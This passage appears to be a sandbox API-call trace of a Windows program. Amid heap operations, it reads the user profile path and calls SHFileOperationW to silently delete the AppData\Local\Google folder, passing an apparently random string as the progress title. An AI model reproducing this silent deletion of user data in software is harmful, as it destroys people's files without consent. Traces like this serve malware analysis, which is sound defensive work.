ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1068, dwReserved1=0x4, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 0 [0209.837] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0209.837] GetLastError () returned 0x12 [0209.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.837] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0209.838] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.838] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x2417000 [0209.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Google", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", lpFilePart=0x8bf658*="Google") returned 0x32 [0209.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0209.840] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google")) returned 0x2010 [0209.841] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\